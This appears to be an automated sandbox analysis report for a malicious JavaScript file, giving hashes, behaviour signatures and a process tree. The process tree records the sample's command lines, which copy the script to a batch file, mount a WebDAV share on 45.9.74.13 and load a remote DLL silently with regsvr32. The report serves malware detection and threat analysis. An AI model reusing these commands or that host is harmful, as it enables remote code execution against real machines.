Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10/07/2024, 22:35
Static task
static1
Behavioral task
behavioral1
Sample
2362313565781516725.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2362313565781516725.js
Resource
win10v2004-20240709-en
General
-
Target
2362313565781516725.js
-
Size
5KB
-
MD5
ad11a8c365332019253eacf65046bcbc
-
SHA1
80291bb0a6c44ac903a71340e31d7d5425f90749
-
SHA256
e933ca12b57e64a87cbf02dd5630c48cec4fc1796dd676bcf34fd1d32ca8101c
-
SHA512
260997341d1b6075e1676a1d85be310c3ee848e881d95b96abf0f986cfd76f07027ff3ae1256c10fb75c7b0892efa5aacee1872e641aa83b6b18a8b188d2bdc6
-
SSDEEP
96:7hDCqEsCLafxW1/8UIAn/8US4VmnJeHLkpa7s7LPFid6Fi0P2sRFidvdiYa2kHa1:7hdUWWQAD8GZs7odzox+dv0YHkHy
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1308 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1944 wrote to memory of 2504 1944 wscript.exe 29 PID 1944 wrote to memory of 2504 1944 wscript.exe 29 PID 1944 wrote to memory of 2504 1944 wscript.exe 29 PID 2504 wrote to memory of 644 2504 cmd.exe 31 PID 2504 wrote to memory of 644 2504 cmd.exe 31 PID 2504 wrote to memory of 644 2504 cmd.exe 31 PID 2504 wrote to memory of 1308 2504 cmd.exe 32 PID 2504 wrote to memory of 1308 2504 cmd.exe 32 PID 2504 wrote to memory of 1308 2504 cmd.exe 32 PID 2504 wrote to memory of 1308 2504 cmd.exe 32 PID 2504 wrote to memory of 1308 2504 cmd.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2362313565781516725.js1⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2362313565781516725.js" "C:\Users\Admin\\vujtwv.bat" && "C:\Users\Admin\\vujtwv.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:644
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\601.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1308
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5ad11a8c365332019253eacf65046bcbc
SHA180291bb0a6c44ac903a71340e31d7d5425f90749
SHA256e933ca12b57e64a87cbf02dd5630c48cec4fc1796dd676bcf34fd1d32ca8101c
SHA512260997341d1b6075e1676a1d85be310c3ee848e881d95b96abf0f986cfd76f07027ff3ae1256c10fb75c7b0892efa5aacee1872e641aa83b6b18a8b188d2bdc6